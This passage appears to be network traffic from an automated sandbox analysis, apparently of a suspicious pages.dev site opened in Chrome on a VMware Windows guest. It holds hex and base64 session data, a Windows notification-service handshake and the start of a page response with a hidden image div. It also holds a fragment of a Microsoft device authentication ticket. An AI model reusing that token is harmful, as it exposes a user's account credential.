2024-08-31 22:54:31 UTC	1369	IN	Data Raw: 50 57 4c 31 54 6e 47 6d 33 52 2b 73 76 53 6c 47 75 6b 46 61 63 61 73 73 47 74 64 71 37 78 70 61 37 74 63 74 36 46 56 4e 69 35 73 4c 4c 73 50 54 67 2b 4f 79 55 4e 48 42 75 57 66 6e 6a 67 6a 33 33 79 79 54 31 34 43 63 52 51 34 32 78 69 34 64 57 53 55 72 39 36 32 66 43 4b 49 59 57 41 49 63 68 77 45 55 5a 38 42 51 6d 61 4e 49 4d 6a 6c 4f 55 45 6d 41 46 50 77 5a 55 57 65 44 4e 55 70 75 6d 4f 4d 6c 2b 63 6c 37 74 78 59 36 69 56 42 50 53 79 48 4f 75 63 31 79 4f 39 66 73 31 67 65 65 74 63 61 2b 58 38 33 72 35 52 62 4c 35 6b 76 35 32 44 47 71 4f 54 38 7a 38 64 4d 63 77 33 49 39 75 6e 58 4c 70 48 48 33 72 4e 57 76 76 79 32 46 58 49 5a 77 6d 70 47 34 53 78 6c 77 79 33 48 74 4d 2f 49 56 5a 76 77 7a 78 32 67 54 72 41 73 4b 50 74 44 65 63 5a 76 46 45 35 45 76 6a 6b 79 Data Ascii: PWL1TnGm3R+svSlGukFacassGtdq7xpa7tct6FVNi5sLLsPTg+OyUNHBuWfnjgj33yyT14CcRQ42xi4dWSUr962fCKIYWAIchwEUZ8BQmaNIMjlOUEmAFPwZUWeDNUpumOMl+cl7txY6iVBPSyHOuc1yO9fs1geetca+X83r5RbL5kv52DGqOT8z8dMcw3I9unXLpHH3rNWvvy2FXIZwmpG4Sxlwy3HtM/IVZvwzx2gTrAsKPtDecZvFE5Evjky
2024-08-31 22:54:31 UTC	1369	IN	Data Raw: 70 43 57 6a 78 38 5a 46 42 75 76 50 4f 51 58 50 32 46 2f 66 4b 58 50 2b 6d 57 66 56 32 44 4d 71 49 65 47 77 6b 49 6f 52 7a 58 77 70 6f 49 78 33 74 48 35 46 75 50 39 73 70 4e 64 78 36 57 53 7a 37 2f 6b 76 7a 44 45 33 31 4b 6e 68 55 66 66 39 56 69 4f 58 63 56 42 69 66 4c 53 6e 4d 65 56 4a 76 56 50 2b 30 30 6e 47 41 45 4b 73 34 54 6d 61 67 66 65 48 4e 4d 44 71 49 32 69 49 38 63 6c 58 61 43 6d 78 62 68 6a 32 47 77 4c 65 57 36 50 69 4d 2b 64 56 2b 50 58 41 46 69 66 4f 63 78 50 63 68 35 4e 53 63 78 57 47 2b 57 34 36 73 2f 31 38 53 61 4d 49 38 66 47 70 54 2f 38 72 65 48 35 4a 5a 2f 36 5a 49 68 62 69 31 6e 51 44 75 75 6a 6e 2f 30 61 6b 33 71 55 6b 6e 6a 42 6e 6c 63 75 6a 44 4f 55 72 42 31 54 66 74 79 54 44 6d 69 42 48 46 52 53 61 63 77 72 5a 73 65 68 75 37 6c 36 Data Ascii: pCWjx8ZFBuvPOQXP2F/fKXP+mWfV2DMqIeGwkIoRzXwpoIx3tH5FuP9spNdx6WSz7/kvzDE31KnhUff9ViOXcVBifLSnMeVJvVP+00nGAEKs4TmagfeHNMDqI2iI8clXaCmxbhj2GwLeW6PiM+dV+PXAFifOcxPch5NScxWG+W46s/18SaMI8fGpT/8reH5JZ/6ZIhbi1nQDuujn/0ak3qUknjBnlcujDOUrB1TftyTDmiBHFRSacwrZsehu7l6
2024-08-31 22:54:31 UTC	1369	IN	Data Raw: 73 57 4e 67 34 50 6f 4f 77 49 6e 48 6e 67 54 49 6c 74 79 4a 44 6d 51 4d 6c 39 30 58 6b 6d 41 36 4d 45 38 52 30 57 4b 71 2b 30 55 70 78 41 38 4c 42 6c 67 79 37 56 2f 30 6a 42 58 6d 4b 39 79 56 73 36 71 70 36 73 53 79 6e 4d 42 4e 4d 55 59 64 59 6d 4c 7a 42 78 38 65 37 42 67 4e 5a 53 71 78 5a 67 42 6e 45 70 50 66 56 77 63 51 70 36 47 4e 4a 58 56 38 6b 45 43 50 4f 55 51 62 34 32 2f 4d 70 6b 56 37 54 52 6b 49 2f 46 67 45 44 62 7a 57 58 49 69 6e 42 39 7a 65 4f 6e 68 6b 64 6e 30 48 55 67 50 49 55 35 69 73 2f 77 57 51 70 51 74 67 47 6e 52 48 53 48 6a 67 31 49 6b 4e 78 4f 31 4d 65 63 4a 6e 6c 72 59 69 62 4e 34 2b 68 7a 45 45 6f 74 79 4c 64 4d 4a 47 6c 62 54 6d 53 38 65 59 46 71 61 2b 45 47 51 69 69 65 39 49 33 57 4a 4d 41 51 37 73 7a 77 35 4f 37 78 30 43 4f 76 6b Data Ascii: sWNg4PoOwInHngTIltyJDmQMl90XkmA6ME8R0WKq+0UpxA8LBlgy7V/0jBXmK9yVs6qp6sSynMBNMUYdYmLzBx8e7BgNZSqxZgBnEpPfVwcQp6GNJXV8kECPOUQb42/MpkV7TRkI/FgEDbzWXIinB9zeOnhkdn0HUgPIU5is/wWQpQtgGnRHSHjg1IkNxO1MecJnlrYibN4+hzEEotyLdMJGlbTmS8eYFqa+EGQiie9I3WJMAQ7szw5O7x0COvk
2024-08-31 22:54:31 UTC	1369	IN	Data Raw: 42 50 33 5a 4d 6c 66 6b 69 6c 66 42 49 41 31 65 44 34 38 6e 69 4f 6c 41 58 79 66 36 45 4f 6f 37 43 64 44 4a 54 78 77 62 6b 70 36 42 39 49 62 36 56 52 69 6f 43 2b 66 78 55 58 4b 64 56 35 69 76 63 52 71 57 74 77 69 52 4e 50 6f 51 70 34 39 79 31 69 31 71 6b 68 30 72 2b 46 6e 50 64 4c 68 33 66 37 2b 49 65 53 77 6c 4c 74 2f 4d 78 50 44 6f 6c 6b 4a 4f 6f 6d 53 59 47 65 50 67 45 5a 48 37 66 79 36 79 37 39 6b 67 62 47 4d 4d 68 42 6b 42 65 56 61 75 46 2f 6e 46 64 34 69 73 57 69 64 79 39 4b 43 4b 38 68 50 45 64 45 7a 61 6b 30 39 39 74 34 4f 56 44 41 34 7a 77 53 45 59 73 2f 7a 41 64 46 71 73 61 4b 2b 58 61 7a 62 69 61 68 37 65 5a 37 44 79 4a 55 7a 65 50 6f 52 78 6c 6b 4b 69 4c 76 36 4e 46 4f 51 31 35 37 52 6c 4d 74 44 76 66 75 61 4d 39 6e 6c 67 38 72 57 68 5a 49 45 Data Ascii: BP3ZMlfkilfBIA1eD48niOlAXyf6EOo7CdDJTxwbkp6B9Ib6VRioC+fxUXKdV5ivcRqWtwiRNPoQp49y1i1qkh0r+FnPdLh3f7+IeSwlLt/MxPDolkJOomSYGePgEZH7fy6y79kgbGMMhBkBeVauF/nFd4isWidy9KCK8hPEdEzak099t4OVDA4zwSEYs/zAdFqsaK+Xazbiah7eZ7DyJUzePoRxlkKiLv6NFOQ157RlMtDvfuaM9nlg8rWhZIE
2024-08-31 22:54:31 UTC	1369	IN	Data Raw: 6a 31 36 51 76 44 35 72 4f 2f 2b 36 68 70 35 50 58 65 61 65 4f 38 68 31 52 63 4e 4e 65 77 77 30 32 46 5a 39 66 71 4c 4f 2b 52 37 76 37 35 57 4f 74 76 63 62 61 68 6b 2f 4d 6e 64 4a 2b 51 59 66 78 61 61 5a 38 31 58 46 71 48 6b 54 69 53 39 49 54 45 73 4f 47 71 78 59 4c 2f 34 79 4a 41 6d 62 61 32 41 4d 77 5a 76 38 44 33 33 67 73 69 39 73 44 4e 65 66 43 6b 59 38 44 59 78 7a 50 6c 64 41 4e 74 31 30 33 61 52 6c 52 73 77 67 7a 52 72 59 70 52 33 73 71 49 45 55 52 32 47 66 33 5a 48 4b 6c 6e 67 72 51 6a 4d 41 35 31 38 6f 6d 64 59 2f 73 66 33 73 57 62 4d 43 48 35 58 36 35 39 76 58 69 57 66 65 63 74 79 57 64 62 52 47 43 79 35 7a 48 30 53 35 55 49 50 6e 4f 57 6c 34 30 34 59 39 46 63 76 62 70 4b 2f 65 4f 73 71 2b 65 64 66 58 70 33 70 4f 31 33 45 41 77 66 36 35 62 4d 2f Data Ascii: j16QvD5rO/+6hp5PXeaeO8h1RcNNeww02FZ9fqLO+R7v75WOtvcbahk/MndJ+QYfxaaZ81XFqHkTiS9ITEsOGqxYL/4yJAmba2AMwZv8D33gsi9sDNefCkY8DYxzPldANt103aRlRswgzRrYpR3sqIEUR2Gf3ZHKlngrQjMA518omdY/sf3sWbMCH5X659vXiWfectyWdbRGCy5zH0S5UIPnOWl404Y9FcvbpK/eOsq+edfXp3pO13EAwf65bM/
2024-08-31 22:54:31 UTC	1369	IN	Data Raw: 62 44 70 45 38 4c 50 57 6a 4b 75 55 70 58 45 34 79 64 4d 64 43 4c 5a 65 54 6a 63 48 74 46 2b 6b 38 48 4d 68 55 48 48 5a 35 4c 33 74 44 6a 4e 75 32 6d 62 53 49 37 72 67 68 65 5a 4f 4c 35 6d 6a 68 62 6f 79 54 4b 4a 30 68 6b 30 47 67 2f 44 37 62 59 52 68 68 6e 46 48 41 30 65 59 41 6b 65 77 38 4d 79 48 2f 36 33 49 76 79 65 53 78 72 70 67 74 37 6a 77 37 4b 4b 2f 2f 79 42 66 6e 6b 39 32 41 59 38 73 79 6f 63 57 6a 71 43 39 43 72 6e 43 56 54 51 4c 68 49 6c 67 53 54 55 56 61 55 6b 36 61 61 67 42 4e 71 37 49 79 75 5a 37 43 63 77 71 7a 52 78 79 31 2f 54 52 69 43 54 53 51 78 71 4c 63 61 4e 73 62 4f 71 77 4a 62 67 34 5a 2f 69 6b 64 44 4a 68 6f 57 51 56 4b 65 66 4e 57 33 52 6c 63 66 6c 53 7a 77 65 75 48 47 4d 62 30 72 61 36 69 54 76 6a 4f 6a 38 75 36 76 48 35 4a 66 2b Data Ascii: bDpE8LPWjKuUpXE4ydMdCLZeTjcHtF+k8HMhUHHZ5L3tDjNu2mbSI7rgheZOL5mjhboyTKJ0hk0Gg/D7bYRhhnFHA0eYAkew8MyH/63IvyeSxrpgt7jw7KK//yBfnk92AY8syocWjqC9CrnCVTQLhIlgSTUVaUk6aagBNq7IyuZ7CcwqzRxy1/TRiCTSQxqLcaNsbOqwJbg4Z/ikdDJhoWQVKefNW3RlcflSzweuHGMb0ra6iTvjOj8u6vH5Jf+
2024-08-31 22:54:31 UTC	1369	IN	Data Raw: 34 42 65 4d 4f 78 6e 63 50 6c 6c 51 6a 76 4e 46 6e 6e 58 6a 4f 33 4e 79 46 55 6a 66 36 64 6a 67 33 2b 71 71 6b 48 51 6b 59 4a 34 67 4e 31 6a 75 70 37 69 72 4f 55 6d 4a 44 66 66 70 4b 78 65 68 70 42 63 73 62 51 53 69 33 49 68 4e 31 50 5a 45 2b 66 5a 2b 75 43 61 70 36 68 34 48 41 47 57 38 71 70 46 42 57 4b 76 6a 6e 71 32 39 63 57 71 4d 2f 68 4b 76 77 47 54 6a 7a 79 72 48 68 78 37 53 44 78 4d 44 51 47 65 36 48 6e 66 45 43 33 50 4f 6f 36 39 6c 41 5a 6d 59 4d 74 6f 33 45 6f 47 30 78 6a 54 66 36 4b 6b 55 78 51 57 4c 36 54 49 46 78 4b 6c 34 72 68 57 45 48 72 68 36 52 53 6c 63 72 57 4e 34 49 6c 4e 77 54 6d 61 51 66 70 36 76 45 37 45 7a 64 6f 61 45 73 44 56 49 71 46 39 57 31 31 41 6a 33 36 44 4f 50 66 68 4a 6c 45 49 59 76 42 71 53 35 61 6b 38 4c 57 44 61 47 7a 4e Data Ascii: 4BeMOxncPllQjvNFnnXjO3NyFUjf6djg3+qqkHQkYJ4gN1jup7irOUmJDffpKxehpBcsbQSi3IhN1PZE+fZ+uCap6h4HAGW8qpFBWKvjnq29cWqM/hKvwGTjzyrHhx7SDxMDQGe6HnfEC3POo69lAZmYMto3EoG0xjTf6KkUxQWL6TIFxKl4rhWEHrh6RSlcrWN4IlNwTmaQfp6vE7EzdoaEsDVIqF9W11Aj36DOPfhJlEIYvBqS5ak8LWDaGzN

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.6	49717	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:32 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 34 2f 6a 4b 57 75 48 48 6d 30 65 36 57 4f 63 56 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 63 34 61 39 35 37 33 38 37 37 33 35 37 64 66 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: 4/jKWuHHm0e6WOcV.1Context: 6c4a9573877357df
2024-08-31 22:54:32 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-08-31 22:54:32 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 34 2f 6a 4b 57 75 48 48 6d 30 65 36 57 4f 63 56 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 63 34 61 39 35 37 33 38 37 37 33 35 37 64 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 37 42 6f 6e 47 4e 65 45 4c 64 79 76 63 53 63 65 6e 48 56 42 2b 64 68 69 48 69 31 36 4f 43 45 66 54 71 33 4e 58 31 55 54 72 4c 71 65 34 76 79 79 52 76 41 4c 75 54 53 39 69 2f 65 67 41 2f 2b 63 32 33 6f 6f 4d 71 6a 47 55 4c 43 68 2b 4f 39 68 70 52 73 47 6c 32 48 56 6f 65 79 6a 79 6e 37 32 71 66 66 70 36 56 57 7a 64 66 31 46 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 4/jKWuHHm0e6WOcV.2Context: 6c4a9573877357df<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAW7BonGNeELdyvcScenHVB+dhiHi16OCEfTq3NX1UTrLqe4vyyRvALuTS9i/egA/+c23ooMqjGULCh+O9hpRsGl2HVoeyjyn72qffp6VWzdf1F
2024-08-31 22:54:32 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 34 2f 6a 4b 57 75 48 48 6d 30 65 36 57 4f 63 56 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 63 34 61 39 35 37 33 38 37 37 33 35 37 64 66 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: 4/jKWuHHm0e6WOcV.3Context: 6c4a9573877357df<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-08-31 22:54:32 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-08-31 22:54:32 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 7a 6b 41 73 65 46 6f 2b 70 55 36 34 44 77 6e 37 39 43 77 37 61 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: zkAseFo+pU64Dwn79Cw7aw.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49716	172.66.47.137	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:33 UTC	692	OUT	GET /favicon.ico HTTP/1.1 Host: bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:54:33 UTC	782	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 22:54:33 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=0, must-revalidate referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tNZOm7T9uQiHQNiCMMwADbKMa0NsIvszsl6OJdfsQeNLCDtp0lpF4cCbzHtNqXLCvBPDAAwxEnxHLLrXrYL6p1lqKQYrwEY894VABSxJJNoiJ6RMD6HMzD9NcVYfsAZcRbevoveMN3Z6KS5r4qTHZjbMMLYquA8JkaGxGFGYcfQNdnMXdZIEF7gHfUarSLJF3zBOBV5c8w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bc09a629c6d238e-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 22:54:33 UTC	1369	IN	Data Raw: 34 61 65 66 0d 0a 3c 64 69 76 20 69 64 3d 22 68 62 67 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 30 30 70 78 3b 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 20 30 20 61 75 74 6f 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 22 3e 0d 0a 3c 69 6d 67 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 30 30 25 3b 22 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 4d 67 41 41 41 43 35 43 41 59 41 41 41 42 74 4a 6e 44 36 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 41 52 6e 51 55 31 42 41 41 43 78 6a 77 76 38 59 51 55 41 41 41 41 4a 63 45 68 5a 63 77 41 41 44 73 49 41 41 41 37 43 41 52 55 6f 53 6f 41 41 41 44 4c 46 53 Data Ascii: 4aef<div id="hbg" style="width: 100px;margin: 0 auto; 0 auto;visibility:hidden;"><img style="width: 100%;" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAMgAAAC5CAYAAABtJnD6AAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsIAAA7CARUoSoAAADLFS
2024-08-31 22:54:33 UTC	1369	IN	Data Raw: 61 2b 43 37 47 63 55 45 67 74 4d 44 4f 4c 51 6c 48 4b 56 55 61 42 37 46 70 43 6e 55 77 59 6a 47 69 50 46 42 70 36 67 70 53 47 4a 30 76 51 34 4e 76 67 49 43 50 30 46 45 57 48 43 4b 5a 32 71 65 42 38 72 51 39 44 4e 33 55 50 7a 58 68 4e 49 4c 42 6f 62 4d 69 66 56 30 59 38 48 41 6a 57 44 6f 31 77 4d 35 6f 67 74 33 52 75 6c 42 6b 37 63 72 41 42 75 47 73 55 51 51 6b 62 6f 45 39 73 6e 41 2b 76 45 36 2b 30 77 56 57 77 39 67 67 44 54 67 6e 56 56 49 74 44 7a 4c 5a 49 50 37 65 2f 65 69 54 72 54 4b 6e 34 54 5a 45 76 78 75 68 4a 59 46 51 49 31 50 44 4c 65 57 73 4a 36 7a 63 45 36 7a 53 75 59 6e 54 44 75 4b 4d 79 4e 77 6d 54 37 30 4b 49 4d 42 5a 32 42 59 48 39 6f 68 30 50 52 50 49 36 68 74 46 31 6d 77 57 32 62 59 44 5a 47 6b 62 4a 77 6d 62 59 62 4c 67 37 4c 45 45 31 79 Data Ascii: a+C7GcUEgtMDOLQlHKVUaB7FpCnUwYjGiPFBp6gpSGJ0vQ4NvgICP0FEWHCKZ2qeB8rQ9DN3UPzXhNILBobMifV0Y8HAjWDo1wM5ogt3RulBk7crABuGsUQQkboE9snA+vE6+0wVWw9ggDTgnVVItDzLZIP7e/eiTrTKn4TZEvxuhJYFQI1PDLeWsJ6zcE6zSuYnTDuKMyNwmT70KIMBZ2BYH9oh0PRPI6htF1mwW2bYDZGkbJwmbYbLg7LEE1y
2024-08-31 22:54:33 UTC	1369	IN	Data Raw: 4b 4a 63 61 72 44 35 6b 4c 63 66 6f 78 70 56 6c 69 33 6c 65 62 41 4e 64 6e 53 66 72 5a 4d 56 6b 6b 57 4e 69 6b 59 30 67 35 58 53 4b 36 57 43 54 32 4f 52 52 69 68 68 47 4c 79 73 79 70 59 4f 79 75 70 4c 72 59 46 70 51 6e 34 35 74 53 47 71 48 44 5a 57 47 5a 56 6d 46 6d 58 77 49 63 77 7a 7a 68 45 41 64 30 78 61 51 59 7a 4b 51 6a 69 42 32 52 36 5a 46 6d 45 5a 37 54 50 71 6b 2f 67 37 54 6c 49 46 4d 61 61 46 59 44 6a 45 49 58 35 71 34 4e 6c 46 58 4f 5a 62 6c 4a 47 54 51 70 4c 4f 6a 6c 44 34 64 49 6f 30 4f 6e 5a 4c 5a 69 6a 6d 6d 41 73 6b 45 4d 5a 32 56 46 53 71 4e 6c 5a 69 48 75 45 46 45 57 4b 71 5a 59 64 4b 61 51 52 68 78 52 73 46 43 4b 4d 38 49 6b 38 61 30 49 36 6b 39 42 50 57 56 38 78 52 6d 52 4a 34 6f 42 53 4f 6e 67 61 35 32 73 4c 53 67 56 4a 6b 35 4a 68 78 Data Ascii: KJcarD5kLcfoxpVli3lebANdnSfrZMVkkWNikY0g5XSK6WCT2ORRihhGLysypYOyupLrYFpQn45tSGqHDZWGZVmFmXwIcwzzhEAd0xaQYzKQjiB2R6ZFmEZ7TPqk/g7TlIFMaaFYDjEIX5q4NlFXOZblJGTQpLOjlD4dIo0OnZLZijmmAskEMZ2VFSqNlZiHuEFEWKqZYdKaQRhxRsFCKM8Ik8a0I6k9BPWV8xRmRJ4oBSOnga52sLSgVJk5Jhx
2024-08-31 22:54:33 UTC	1369	IN	Data Raw: 5a 6b 70 74 37 30 47 37 76 6b 31 4d 4b 49 35 44 53 49 76 33 53 74 79 36 4e 48 41 7a 34 68 36 45 47 54 39 31 52 68 38 4a 41 6a 43 64 4d 31 74 63 43 42 49 78 52 57 61 41 4c 41 4b 6a 53 44 47 56 69 78 52 46 55 45 6f 4d 43 53 79 6a 30 52 63 66 65 31 34 6b 34 61 49 38 79 63 68 54 71 38 75 49 4d 68 62 46 35 65 78 69 38 58 38 56 4a 34 36 59 78 4e 6d 57 58 51 2b 61 4e 58 4d 41 44 6e 6d 59 4e 42 39 35 63 33 4c 71 35 49 63 78 49 57 64 54 66 4c 4e 6d 31 62 49 50 43 36 33 58 4a 75 6b 48 4a 6a 7a 36 5a 36 30 55 47 35 42 50 57 71 69 48 58 65 78 31 48 4a 4c 4f 37 57 55 63 66 7a 56 34 4d 4b 6c 46 71 73 57 64 7a 52 2b 6e 37 50 6a 62 62 30 34 66 35 4b 4c 30 36 4d 63 4c 69 58 47 43 52 4a 32 6e 4f 34 70 48 70 49 79 73 31 51 7a 67 2b 6e 47 52 50 37 73 46 35 62 4b 47 38 2b 74 Data Ascii: Zkpt70G7vk1MKI5DSIv3Sty6NHAz4h6EGT91Rh8JAjCdM1tcCBIxRWaALAKjSDGVixRFUEoMCSyj0Rcfe14k4aI8ychTq8uIMhbF5exi8X8VJ46YxNmWXQ+aNXMADnmYNB95c3Lq5IcxIWdTfLNm1bIPC63XJukHJjz6Z60UG5BPWqiHXex1HJLO7WUcfzV4MKlFqsWdzR+n7Pjbb04f5KL06McLiXGCRJ2nO4pHpIys1Qzg+nGRP7sF5bKG8+t
2024-08-31 22:54:33 UTC	1369	IN	Data Raw: 7a 63 77 47 31 2f 54 6f 35 4a 52 33 6b 45 4b 64 57 52 49 62 51 69 72 72 61 58 72 57 79 57 72 59 73 62 41 33 45 4b 50 48 4a 30 55 4c 37 2b 61 43 2b 57 56 67 6c 56 4e 50 56 77 53 56 4b 4b 47 44 61 77 64 50 75 6e 76 62 33 71 6a 63 4f 30 4f 48 64 4a 6b 31 7a 4d 4c 56 2f 4f 49 6b 6c 35 71 7a 67 54 53 56 30 36 48 58 53 68 39 49 79 4c 67 52 75 56 6f 4a 70 6a 59 70 43 64 49 46 6b 37 68 66 70 6a 49 74 65 66 6b 38 33 32 2b 4f 76 64 76 54 49 79 4d 4a 70 63 51 78 4c 44 4a 6f 63 61 67 45 34 46 33 66 72 61 56 31 33 47 49 54 78 30 64 6c 54 2b 7a 6d 77 64 70 38 52 31 6d 39 4c 75 5a 75 6b 4b 78 71 68 47 64 54 56 38 4d 73 4b 75 4f 2b 47 47 63 30 77 34 30 68 4d 6b 72 74 50 69 59 4b 36 57 64 44 43 49 72 31 6e 66 71 73 52 70 63 48 61 34 49 4e 39 36 45 67 4f 57 39 6b 70 53 6d Data Ascii: zcwG1/To5JR3kEKdWRIbQirraXrWyWrYsbA3EKPHJ0UL7+aC+WVglVNPVwSVKKGDawdPunvb3qjcO0OHdJk1zMLV/OIkl5qzgTSV06HXSh9IyLgRuVoJpjYpCdIFk7hfpjItefk832+OvdvTIyMJpcQxLDJocagE4F3fraV13GITx0dlT+zmwdp8R1m9LuZukKxqhGdTV8MsKuO+GGc0w40hMkrtPiYK6WdDCIr1nfqsRpcHa4IN96EgOW9kpSm
2024-08-31 22:54:33 UTC	1369	IN	Data Raw: 7a 66 59 2b 50 78 49 42 66 69 6c 63 4a 66 58 6d 72 50 48 58 47 42 6b 34 77 68 4b 75 62 74 67 71 2b 76 48 4b 55 6a 30 4a 68 69 59 79 4d 66 42 6b 6b 75 56 46 4c 4c 49 4b 55 65 37 4b 5a 4c 71 46 44 43 78 68 44 4e 48 37 54 59 73 6e 63 65 6d 6e 68 4b 37 56 5a 36 30 4e 39 6c 63 5a 4a 6d 4a 52 50 6d 43 59 34 74 6a 66 50 55 53 34 74 6a 76 65 4e 46 4f 63 66 35 6d 6c 46 68 44 49 48 53 75 36 4a 6a 4e 50 33 6f 59 4a 72 53 51 34 50 32 42 2b 6a 6f 78 2f 55 6f 52 52 47 75 67 39 5a 4f 68 44 4c 6b 42 4d 5a 76 6b 33 46 6a 7a 6b 73 56 4f 39 61 70 43 77 67 72 49 74 54 4b 53 63 59 67 52 76 48 73 75 43 57 74 54 65 6f 6a 7a 4f 6b 42 65 2b 62 52 4e 5a 6b 4b 6b 38 6e 63 37 73 63 47 31 6d 4a 45 53 66 50 4d 66 45 6f 46 4c 62 4b 6a 76 63 74 70 37 63 38 67 68 42 78 56 79 36 33 49 38 Data Ascii: zfY+PxIBfilcJfXmrPHXGBk4whKubtgq+vHKUj0JhiYyMfBkkuVFLLIKUe7KZLqFDCxhDNH7TYsncemnhK7VZ60N9lcZJmJRPmCY4tjfPUS4tjveNFOcf5mlFhDIHSu6JjNP3oYJrSQ4P2B+jox/UoRRGug9ZOhDLkBMZvk3FjzksVO9apCwgrItTKScYgRvHsuCWtTeojzOkBe+bRNZkKk8nc7scG1mJESfPMfEoFLbKjvctp7c8ghBxVy63I8
